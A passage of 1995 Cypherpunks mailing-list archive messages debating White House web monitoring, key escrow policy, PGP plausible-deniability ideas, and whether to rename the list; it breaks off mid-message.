Certainly, Orlin's postings are of primary interest to everyone.  Perhaps 
the White House Staff needs a new fiction writer for the next State of 
the Union address!!  :-)

> >Ooops.  Dog bites man.
> >And do you really think the White House couldn't hire a couple of net 
> >gurus to sniff packets if they wanted to hide their "monitoring"(=reading).
> 
> who sez they dont post, too?
> heh

Your scoop related to net monitoring, not posting.  I anxiously await 
your sequel. And so what if they did post.  Maybe you are concerned about 
anonymous posting from the Administration???

And technically speaking, I guess, I am part of the Administration as an 
employee of the Executive Branch with some discretion in how I do my job. 
In the same sense, I was a part of Bush's Administration.

Having had two rounds of off topic posting on this thread, I intend to 
give you the last word.  I hope I can resist posting in response to what 
I am sure will be a thoughtful and enlightening reply.

Sauron

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame way! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 12 Sep 95 20:53:33 PDT
To: Mac Norton <mnorton@cavern.uark.edu>
Subject: Re: GAK
In-Reply-To: <Pine.SOL.3.91.950912202830.20805B-100000@cavern>
Message-ID: <Pine.D-G.3.91.950912235711.4405F-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Sep 1995, Mac Norton wrote:

> What's technology got to do with it, in principle?  If
> I write a letter in code, do I have to send the FBI the
> key, just in case?
...
The distinction, I think, is that for the past 40, 50, 60 ??? years, 
wiretapping has been available, recently only through court order 
(lawfully).  Encryption changes the status quo.

Change brings those who want to hasten it and those who want to stop it.  
The problem here, at least for me, is what *should* the policy be.  You 
(with one or two exceptions) have provided me with a lot of grist for the 
mill.  My thought process has changed dramatically on the issue, but is 
still fluid.

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 12 Sep 95 21:03:34 PDT
To: cypherpunks@toad.com
Subject: Re: Whitehouse "dissident" web site monitoring?
In-Reply-To: <9509130255.AA03446@sulphur.osf.org>
Message-ID: <9509130402.AA22458@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>What abuse?  Is there an expectation of privacy in Web-world,
>such that all users can honestly expect that a site is compelled
>to keep its "visitor log" private?

Absolutely, just as there is an assumption that private email will not be 
distributed over USEnet.

There is a clear expectation of privacy. Just as the user of a USEnet server has 
an expectation of privacy. The question of what is legitimate to use log file 
data for is a very keenly debated one at W3 conferences.


	Phill H-B




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 12 Sep 95 21:38:18 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: Whitehouse "dissident" web site monitoring?
In-Reply-To: <9509130255.AA03446@sulphur.osf.org>
Message-ID: <Pine.D-G.3.91.950913000120.4405G-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Sep 1995, Rich Salz wrote:

> >Seriously folks I'm very pissed about the abuse of log file information. The 
> 
> What abuse?  Is there an expectation of privacy in Web-world,
> such that all users can honestly expect that a site is compelled
> to keep its "visitor log" private?
> 
> Surely not.

I recall some bitter postings when a law enforcement agency got access to 
the log files of a Web page with information about a missing child.  
Perhaps that feeling can be felt on both sides of the fence. 

EBD

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame way! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 13 Sep 95 00:24:37 PDT
To: cypherpunks@toad.com
Subject: Community ConneXion & its new look
Message-ID: <199509130719.AAA12672@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Community ConneXion is in the process of upgrading its web
presence and image. If you'd like to keep abreast of developments,
check http://www.c2.org regularly-- most of the changes are in terms
of focus & marketing angle, but new services should be appearing soon
as well.

-- 
sameer						Voice:   510-601-9777
Network Administrator				FAX:	 510-601-9734
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 12 Sep 95 23:11:19 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: GAK/weak crypto rationale?
In-Reply-To: <199509122051.QAA14953@pipe4.nyc.pipeline.com>
Message-ID: <9509130611.AA19154@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


John Young writes:
>    In response to an audience question about wiretaps and
>    crypto, Mr. Michael Nelson of the White House said at the
>    NIST GAK meeting (paraphrased):
> 
>       We are not concerned with bad people using crypto among
>       themselves, we can handle that. We are more concerned
>       with their using crypto to communicate with regular
>       folks, to make legitimate arrangements -- finance,
>       supplies, travel, and so on -- for their nefarious
>       deeds. It's the intermix of the bad with the good that's
>       the problem.

Most of this reminds me of observations others have made (maybe here) about
LEAs' typical use of wiretapping, commercial records, etc. in gathering
evidence. It was said that criminals are often tracked/caught because of
communications with friends/relatives, and transactions with above-board
businesses to rent cars, buy plane tickets, etc. An argument against
allegations that free crypto is hazardous proceeds, then, by pointing out
that such contacts with *ahem* "regular folks" will be conducted in the
clear, or at least that one party will be cooperative with investigators.

Whether or not I encrypt my conversation with the Phil Zimmermann Travel
Agency, however, doesn't affect the ability or inclination of the PZTA to 
divulge its records to the TLAs. They would no longer beable (old a.r.k. joke)
to learn the contents of the communication directly from a wiretap. But if I
understand the technology correctly, they could certainly trace an encrypted
call to determine the identity of the other party. After that it's a trivial
matter to ask the other party to reveal transaction records. So I don't see
how the strong encryption of the "good" significantly interferes with The
Legitimate Needs of Law Enforcement in and of itself.   

(As an aside, the situation may get murky when the Phil Zimmermann Travel
 Agency carries out transactions over the net with cryptographically sound
 digital pseudonyms. Depending on the circumstances, true ecash with
 reasonable payor anonymity may also need to be involved. This is where I
 suspect untraceable transactions make the LEAs uncomfortable: untraceable
 garden variety transactions)

>    Maybe someone else at the meeting heard this differently
>    and will comment, but this seems to mean that the Feds can
>    track, and maybe crack, the crypto-intercomm of "bad
>    people" so long as it is not buried in a torrent of public
>    crypto use. And not commingled with lawful, ECPA-
>    protected(?), communication.

Hmmm. The bit about "the intermixing of bad and good" is puzzling. "Bad"
and "good" seem to be defined in terms of the identities of the parties to
a communication. Figuring those out isn't hindered by strong crypto per se.
I remain unclear as to the source of their expressed concern.

Your paraphrase of Nelson's statement strikes me as remarkable. Doesn't "we
are not concerned with bad people using crypto among themselves" run
completely counter to all the hyperbole about terrorists planning OKC II
with PGP ?  Does anyone have an exact quotation ?  At any rate, sign me up as
a "bad person"....

Incidentally, recent events in France highlight the absurdity of Les Quatres
Chevaliers. The French government's crypto registration requirements don't 
seem to have been much of a deterrent to the serial Metro bombers -- quelle 
surprise !  I hope someone in Washington is paying attention.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hugh@ecotone.toad.com (Hugh Daniel)
Date: Wed, 13 Sep 95 05:39:28 PDT
To: cypherpunks@toad.com
Subject: ADMIN: How to find out if you have been culled from the list
Message-ID: <9509131238.AA22758@ecotone.toad.com>
MIME-Version: 1.0
Content-Type: text/plain


  If I (or any software I write) remove a user from the
<cypherpunks@toad.com> list the users entry now gets appended to the
culled.users file.  Since I was keeping a list anyway, I have set it
up so that anyone can email/download the list of recently culled
cypherpunks via majordomo.

  If you stop getting your CP drug for too long, before sending a note
to the list(shame!) ask for this file to see if I culled you.  If you
forget how to get a file send a help message to <majordomo@toad.com>.
  Here is a quick (emacs) example of how to get the file:

	To: majordomo@toad.com
	--text follows this line--
	get cypherpunks culled.users
	end

and the file will show up soon.  This is a very boring file (dates and
email addresses).
  You might want to save this message away, so you will have it to
reference if need be.
  Now, you get back to writing that great crypto/UI package!

		||ugh Daniel
		Sometimes Postmaster
		Always Majordomo Potty Trainer
		<hugh@toad.com>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: damion.furi@the-matrix.com (DAMION FURI)
Date: Wed, 13 Sep 95 04:58:40 PDT
To: cypherpunks@toad.com
Subject: Whitehouse "dissident
In-Reply-To: <8B0F439.000504F727.uuout@the-matrix.com>
Message-ID: <8B10180.000504F829.uuout@the-matrix.com>
MIME-Version: 1.0
Content-Type: text/plain



TCM|We don't believe in "security through obscurity," do we? The notion that we
   |are "safe" if the White House, or (horrors!) Janet Reno herself, are not
   |reading our list or the Web sites on various issues, is the same kind of
   |security the ostrich thinks he has with his head in the sand and his butt
   |in the air.

        Maybe so, but we don't have to like it.  And I don't.  But
        it's not so much their access, per se, that I object to.
        It's their potential intentions, all things considered, and
        the fact that they aren't at all open about such monitoring.

TCM|If you want to be unheard by the Feds, and the White House, and the FBI,
   |and GCHQ, and Mossad, etc., then don't post publically. If you want your
   |own access to Web sites kept private, push for the development of Web
   |proxies ("Web remailers").

        Mix or Flame is fine. :)


        furi@the-matrix.com    pgp-public-key@demon.co.uk    C1225CE1
  RADical 1 Systems - Multi-Platform Custom Programming, Service, & Support






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 13 Sep 95 07:35:26 PDT
To: cypherpunks@toad.com
Subject: Re: GAK/weak crypto rationale?
Message-ID: <199509131434.HAA09918@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Responding to msg by futplex@pseudonym.com (Futplex) on Wed, 13 
Sep  2:11 AM

>Your paraphrase of Nelson's statement strikes me as 
>remarkable. Doesn't "we  are not concerned with bad 
>people using crypto among themselves" run  completely 
>counter to all the hyperbole about terrorists planning 
>OKC II  with PGP ?  Does anyone have an exact quotation 
>?  At any rate, sign me up as  a "bad person"....

I think this is setting up the rationale for software key escrow.  One of
the big loopholes in this idea has always been that it would be easy for
bad guys to superencrypt or otherwise bypass the legal encryption.  The
response has been that the systems will be designed so that compliant
systems will not interoperate with rogue systems.  And the counter-response
to that was that criminals (and privacy advocates) would use software
which would operate compliantly with conventional programs and maintain
privacy when talking to other rogue programs.

This new line will be used to respond to this argument, I think.  Even if
it is admitted that there is no way for the government to be able to tell
what the criminals say amongst themselves, it will still be useful to be
able to tell what they say to other people.  Therefore software key
escrow will be argued to still be useful even though it can be defeated.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Wed, 13 Sep 95 08:01:18 PDT
To: bdavis@thepoint.net
Subject: Re: Digital Fingerprinting
Message-ID: <9509131457.AA17323@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> > Then, in W.Ky., as in Stockbridge, "You can get
> > anything you want..."? :)
> 
> I'd stick with:
> ***********************************************
> You can't always get what you want            1
> but if you try
> sometimes, sometimes you get what you need.   2
> ***********************************************
> 
> 1 ability to dump garbage where you want
> 2 a better appreciation for the environment
> :-)


Why do I feel like I'm sitting on the group W bench?

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Wed, 13 Sep 95 08:42:57 PDT
To: adam@bwh.harvard.edu
Subject: Re: Whitehouse "dissident" web site monitoring?
Message-ID: <9509131539.AA17341@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 	Sure.  I'll respect their privacy as much as they, and the
> organizations they oversee, respect mine.  I'll use as the
> respresentative organizations the IRS and the Social Security
> Administration, which respects my pricvacy so much that they use
> prison inmates to process paperwork.
> 
> 	If I was in a nasty mood, I'd add the USPS.
> 
> 	Sarcasm aside, they show no interest in other people's
> privacy.  Why should we go out of our way to do anything but show them
> how bad the situation is?
> 
> Adam


Oh please!  Some clerk browses the internet and you don't want to respect
their privacy because of the IRS?  This makes sense how?  I suppose that
you're going to dig up information about me and spread it around the 
internet because you have issues about the company I work for?

Suppose someone did something bad to you and justified it by saying that
harvard is an elitist school that once did something bad to their uncle.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 13 Sep 95 05:44:35 PDT
To: cypherpunks@toad.com
Subject: Re: GAK/weak crypto rationale?
Message-ID: <199509131244.IAA07887@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by futplex@pseudonym.com (Futplex) on Wed, 13 
Sep  2:11 AM

>Your paraphrase of Nelson's statement strikes me as 
>remarkable. Doesn't "we  are not concerned with bad 
>people using crypto among themselves" run  completely 
>counter to all the hyperbole about terrorists planning 
>OKC II  with PGP ?  Does anyone have an exact quotation 
>?  At any rate, sign me up as  a "bad person"....


   "Bad people" is my euphemism for Mr. Nelson's "terrorist" 
   -- which brought snorts from the audience.

   Yes, his statement about not being concerned with crypto
   use among terrorists was surprising.

   On a verbatim transcript: Mr. Ed Roback of NIST, the KE
   meet director, said that a complete transcript of the
   proceedings will not be published, only a summary report at
   some point, and then, after the September 15 session,
   some version will appear in the Federal Register for public
   comment.

   The summary report should appear eventually at the NIST web
   site -- the CSSPAB site has reports for prior KE sessions
   in the annual reports.

   See <http://csrc.ncsl.nist.gov/csspab/94-rpt.txt> for 1994,
   and similar for earlier years, on key escrow documents.

   To amplify what Tim said, the CSSPAB site has very
   interesting docs.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Henry W. Farkas" <hfarkas@ims.advantis.com>
Date: Wed, 13 Sep 95 06:03:12 PDT
To: cypherpunks@toad.com
Subject: Scientology tries to break PGP - and
Message-ID: <Pine.A32.3.91.950913085122.47812A-100000@pangloss.ims.advantis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


On Tue, 12 Sep 1995, S. Keeling wrote:

> 	I would just like to point out that, when a LEA comes to you
> to get at the contents of your computer, (s)he is not going to
> patiently wait while your system wipes the offending evidence off your
> hard disk.  The first thing they do is make a copy of everything, so
> they can work from the copy.  Besides, you do have backup tapes laying
> around all over the place, don't you?

Acutally, I have *everything* laying around all over the place but I 
suppose that's off-topic.

They have to decrypt the file sometime if they want it's "contents".

I use the -w option when encrypting.  After encryption, the "dummy" file
(would be) embedded and the plaintext is wiped.  The only "secret" key 
is the "fake" key.  The "real" key is under the blender in the kitchen.  
(If I get busted and they search under the blender I will write back if 
I'm in a position to do so.  Not that I have anything to get busted for 
of course. :)  Don't back up plaintext and what is the problem here?  
Where will they get the "real" data from?  What does it matter where the 
decryption takes place?  And no, I don't have backup tapes laying around; 
I use a Zip Drive!  :-)

===========================================================================
     Henry W. Farkas      |      Me?    Speak for IBM?    Fat chance.
 hfarkas@ims.advantis.com |------------------------------------------------  
   hfarkas@vnet.ibm.com   |     http://newstand.ims.advantis.com/henry
      henry@nhcc.com      |          http://www.nhcc.com/~henry 
- ---------------------------------------------------------------------------
PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52  B3 80 34 1C CE 38 EC 53
 Public key at: pgp-public-keys@pgp.mit.edu, and other popular key servers.
- ---------------------------------------------------------------------------
Brought to you by Henry's Hardware: Home of the Pretty Good Hack "We're not
  fast, but it's not bad, and we're cheaper than the guy down the street!"
===========================================================================



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMFbWVqDthkLkvrK9AQFxlAP+P3blN7wD42aUNctsCF9QALqsRdGHPsdo
B6ALA72dqVYXGIsW9M3DVxXAM2WAosHl2rDKXbTrXwirxCJQBPkYQLT9Vdzl8nyJ
hb0uNb2zo9xQ8ImM/dCuUqGazW2tnnAXuHZ9KkwDAQFDwDpNtjkHYCSDRgKmPmWO
fUjGpsVViU8=
=3JI5
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 13 Sep 95 00:10:27 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on GAK
In-Reply-To: <199509111316.JAA02859@pipe2.nyc.pipeline.com>
Message-ID: <199509130710.JAA26140@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack <adam@bwh.harvard.edu> wrote:

>       Its a good thing the administration only wants to outlaw
> cryptography, not anonymity.

But you can't have strong anonymity without strong cryptography.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 13 Sep 95 06:30:47 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: (NOISE) Re: White House MONITORS Web Pages !
In-Reply-To: <8B10180.000504F829.uuout@the-matrix.com>
Message-ID: <9509131330.AA25431@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


This is NOISE !

DAMION FURI writes:
>         Maybe so, but we don't have to like it.  And I don't.  But
>         it's not so much their access, per se, that I object to.

Why the hell do you care ?  Someone has a home page for something on the Web.
Someone at the White House looks at it. So what ?  You object to the fact
that somebody in the government has a Web browser and *gasp* uses it to read
stuff on the WWW ???
  
>	It's their potential intentions, 

You take moral offense to what you think someone else _might_ be thinking ?  
Sounds like you believe in thoughtcrime. Banned any good books lately ?

> 	all things considered, and
>         the fact that they aren't at all open about such monitoring.

This is absurd. You expect the White House to issue a press release every time
a staffer clicks on a URL ?  

	"WASHINGTON (UPI) The Clinton Administration unveiled plans today to
	add several new sites to the White House bookmarks list. At a hastily
	arranged press briefing this morning, Defense Secretary William Perry 
	told reporters that the changes would be implemented in close 
	consultation with NATO allies. There was little immediate reaction 
	from Capitol Hill. Members on both sides of the aisle said they 
	needed time to study the proposal in detail."

Someone please tell me this is just an extremely premature April Fool's joke...

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Wed, 13 Sep 95 06:33:14 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology tries to break PGP - and
Message-ID: <199509131332.JAA29256@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




Henry W. Farkas <hfarkas@ims.advantis.com> writes:
>On Tue, 12 Sep 1995, S. Keeling wrote:
>
>> 	I would just like to point out that, when a LEA comes to you
>> to get at the contents of your computer, (s)he is not going to
>> patiently wait while your system wipes the offending evidence off your
>> hard disk.  ...
>> they can work from the copy.  Besides, you do have backup tapes laying
>> around all over the place, don't you?
>
>They have to decrypt the file sometime if they want it's "contents".
>
>I use the -w option when encrypting.  After encryption, the "dummy" file
>(would be) embedded and the plaintext is wiped.  ...

And the idea is that on decrypting with the 'wrong' key, it outputs the
dummy file rather than the real plaintext, correct?

>          ...  Don't back up plaintext and what is the problem here?  
>Where will they get the "real" data from?  What does it matter where the 
>decryption takes place?  ...

Why would they use your copy of the program to decrypt the file?  They
could just use a version that lacked this 'feature'.  Of course, they
still couldn't get at the real plaintext unless you gave them the key,
but you are right back to the same old standoff where they say, "Give
us your key," and you (try to) say, "No."

--
David R. Conrad, conrad@detroit.freenet.org, http://www.grfn.org/~conrad
Hardware & Software Committee  --  Finger conrad@grfn.org for public key
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 13 Sep 95 07:57:34 PDT
To: trei@process.com
Subject: CYPHERPUNK considered harmful.
In-Reply-To: <9509131434.AA23717@toad.com>
Message-ID: <9509131453.AA31340@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Some comments (and note that I've just cleaned my white board, so I
may not be thinking too rationally):

Peter Trei writes:
 >      "Strong cryptography is a powerful new technology, of which the
 > widespread and unfettered use should be encouraged."
 > 
 >      Our error lies in our approach to encouraging the widespread use of
 > crypto. It is an error of hubris - overweening pride.

Hmm...  I don't think I completely agree with this; on the contrary,
the "senior members" of the list seem generally quite open and
understanding of the issues re cryptography for the general public.

 >      We too often think of ourselves as an elite - smarter and better in
        ^^ [ careful here... ]
 > various ways to our non-cpunk neighbours. We refer to these others as
 > 'Joe Sixpack" and other such derogatary terms. 
 >
 >      The problem is that in doing so we are marginalizing ourselves. 
 > 
 >      We call ourselves 'cypherpunks'. While this is derived from the SF
 > term 'cyberpunk', consider the image we are creating for ourselves:
 > 
 >      A 'punk' is a marginalized young adult, one who rejects the norms
 > of his or her society, and takes delight in irking those around him with
 > his or her rejection. The older of us will think of James Dean in 'Rebel
 > Without a Cause', or Brando in 'The Wild One'. Later, you get images
 > such as Peter Fonda in 'Easy Rider', and more recently, Sid Vicious and
 > other icons of the 'punk rock' movement.

I actually consider this a feature.  With a "straight" name for the
organization, like "International Cryptographic Interest Society" or
something, we run the risk of being co-opted into the "mainstream"
without even realizing it.

There's nothing wrong with being a punk, remember.  That the word is
weighted simply means that people have to overcome prejudice.  Indeed,
much of the motivations for boosting cryptography is to protec the
rights of every individual to be opt out of conformity.  If everyone
were normal & mainstream, who'd care about hiding anything?  What's to
protect?

 >     These punks are often romantic figures, but in reality they started
 > marginalized, remained marginalized, and died marginalized. They were
 > ineffective in changing the core values of the society ...

Whoooa there; can you really say that?  Can you really say that as
society absorbs marginalized fragments of the culture that there's not
a significant adjustment?

In 1955, if I walked down the street with tussled hair, a white
t-shirt covered by a ratty leather jacket, and messy jeans, I'd be an
"obvious" criminal delinquent; now, I'd be in a Calvin Klein add.
There's certainly a profound effect on culture wrought by the mere
existance of fringe groups, particularly if the groups can gain access
to media.

 >     We, the 'cypherpunks' have embraced this label, taking pride in our
 > technical abilities, and acting as if we can institute 'cryptoanarchy'
 > without getting a majority of the population to support us.

I think again that this is a generalization over the membership.  Some
do feel that way, and some don't; I think what you said above about
the uniting factor of wanting to see cryptography popularized is
accurate, and that's the theme that binds us together (if anything
does).

 >     This is a bad approach. The overwhelming majority of the US
 > population is not alienated from the US government, and regards with
 > suspicion those who are.

I wonder about that assertion.

 >      I suggest that we drop the term 'cypherpunk' - it has the wrong
 > connotations to get our ideas into the mainstream. I don't have a 
 > perfect replacement yet:
 > 
 > 1. I want to get away from the strings 'crypt' and c[iy]pher- they sound
 > too cloak-and-dagger.

That idea seems pretty much a fundamental one to be attacked in any
effort to popularize cryptography.

 > 2. It should imply that the labelees are level-headed, responsible
 > citizens, not longhaired weirdos.

Again, I think that making a strong statement every time the name of
the organization has to be read aloud by a newscaster is a feature.

 > 3. It should make itself difficult to invert - the classic example
 > is the pro-choice/pro-life dichotomy, where each side refuses to
 > acknowledge the other's terminology.

Is "cypherpunk" invertible?

 > 4. A cute and apropos acronym would help.

...  Sorry, I have to quit now; I need to borrow a fan before the
fumes knock me out.

In summary, I think your concerns are valid, but I'd hesitate to do
something radical like change the list name.  After all, think of all
the mail filter files that'd have to be fixed :-)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 13 Sep 95 07:12:24 PDT
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Whitehouse "dissident" web site monitoring?
Message-ID: <199509131412.KAA26837@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:03 PM 9/12/95 -0400, Brian Davis wrote:

>Unbelievable!!!  To add to this distressing truth, I have learned that 
>the White House also subscribes to a number of newspapers and periodicals 
>which are reviewed for things of interest to the Administration and to 
>the President. I I I I I I ammmmmmmmmm shocked!

The government, as you no doubt know, sometimes operates under different
rules.  Thus when the "Red Squad" (Intelligence Division) of the New York
City Police (located in that big building on the North side of Vandam
between Greenwich and Houston BTW) was sued for maintaining files on "lawful
protest groups" they entered into a consent agreement to refrain from this
sort of thing.  Later, the courts said that this agreement meant that the
cops couldn't even listen to WLIB radio (NYC's favorite radical
African-American station) to find out in advance where rallies were going to be.

Since the White House is doing this reading of sites with public funds and
since that institution is the most powerful in the world --- it can nuke its
enemies, for example --- people are naturally interested to discover if they
are the subject of an investigation.

This is a demonstration of the unintended effect of electronic surveillance
technology.  The fact is that it can do more harm to the authorities than to
the public.  The Nixon Tapes/The Thompson Square Park Riot Video/The Rodney
King Video.  Since those in power are more interesting than ordinary people,
they represent a more "target-rich environment."  Information about their
activities has greater commercial value and is thus more likely to see the
light of day.

DCF

"There are more of us than there are of you."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 13 Sep 95 07:17:23 PDT
To: hallam@w3.org
Subject: Re: Whitehouse "dissident" web site monitoring?
In-Reply-To: <9509130226.AA22319@zorch.w3.org>
Message-ID: <199509131416.KAA06476@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


Phill wrote:

| If we are serious about privacy I think we should be very clear that
| we respect the privacy of Whitehouse staffer and staffers in the
| Senate and House. I'm not being partisan about this, I have put a
| lot of effort into getting participationfrom the right as well as
| the left. I've just not been very successful in that area.


	Sure.  I'll respect their privacy as much as they, and the
organizations they oversee, respect mine.  I'll use as the
respresentative organizations the IRS and the Social Security
Administration, which respects my pricvacy so much that they use
prison inmates to process paperwork.

	If I was in a nasty mood, I'd add the USPS.

	Sarcasm aside, they show no interest in other people's
privacy.  Why should we go out of our way to do anything but show them
how bad the situation is?

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yih-Chun Hu <yihchun@u.washington.edu>
Date: Wed, 13 Sep 95 10:21:27 PDT
To: Andy Brown <asb@nexor.co.uk>
Subject: Re: Scientology tries to break PGP - and
In-Reply-To: <Pine.SOL.3.91.950913163953.25308J-100000@eagle.nexor.co.uk>
Message-ID: <Pine.OSF.3.91j.950913101455.27871A-100000@saul4.u.washington.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Sep 1995, Andy Brown wrote:

> On Wed, 13 Sep 1995, Henry W. Farkas wrote:
>  
> > If decrypted with the "alternate" or "fake" secret key, the encrypted file
> > is wiped until it reaches a marker; the remainder of the file is
> > displayed.  If you use your "primary" or "real key", the extraneous text
> > is simply stripped.
> 
> Useless I'm afraid.  They have the source code and have disabled your
> "feature" and attached loud alarm bells to it.
> 

I don't see whats wrong with removing any checking done by PGP.
(ie don't keep a checksum or whatever) After all, they can't prove
that you didn't just encrypt a pgp +makerandom file.

Obviously, I would not want to use this "feature" in some cases,
so make adding a checksum be an extra command line option.

The new feature would of course not be backwards compatible, but
there is no way to disable the "feature" and no way to attach
loud alarm bells.

Of course, you are then faced with giving them a key which you know
will decrypt the file to gibberish. Ideally, you would steno the 
encrypted file.

+---- Yih-Chun Hu (finger:yihchun@cs.washington.edu) ----------------------+
| http://www.cs.washington.edu/homes/yihchun     yihchun@cs.washington.edu |
| http://weber.u.washington.edu/~yihchun         yihchun@u.washington.edu  |
+---- PGP Key Fingerprints (Keys by FINGER or on WWW) ---------------------+
| 1024/E50EC641        B2 A0 DE 9E 36 C0 EB A6  F9 3E D2 DD 2F 27 74 79    |
| 2047/DF0403F9        18 EB 62 C8 7F 06 04 67  42 76 24 E2 99 D1 07 DC    |
+---- Random Thought ------------------------------------------------------+
|I conducted an experiment to test Murphy's Law, but everything went wrong.|
+--------------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 13 Sep 95 10:16:23 PDT
To: cypherpunks@toad.com
Subject: Can GAK be made "not interoperable" with PGP?
Message-ID: <ac7c5e4817021004ba64@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:34 PM 9/13/95, Hal wrote:

>I think this is setting up the rationale for software key escrow.  One of
>the big loopholes in this idea has always been that it would be easy for
>bad guys to superencrypt or otherwise bypass the legal encryption.  The
>response has been that the systems will be designed so that compliant
>systems will not interoperate with rogue systems.  And the counter-response
                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>to that was that criminals (and privacy advocates) would use software
>which would operate compliantly with conventional programs and maintain
>privacy when talking to other rogue programs.

But is this even possible, to make a GAK system "not interoperable" with,
say, PGP?

Unless the GAK system has some sort of entropy analyzer, and can recognize
high-entropy sources which it presumes to be encrypted data (*), one can of
course PGP-encrypt a text file and then GAK the resulting file.

Many of us are already using PGP mostly in this way, i.e., writing files in
text editors, PGP-encryting and getting an ASCII file back, and then
sending. GAK will still have to deal with this mode.

(* On the idea of entropy analyzers. This is implausible, for many reasons.
Any high-entropy file could have the entropy reduced by padding with
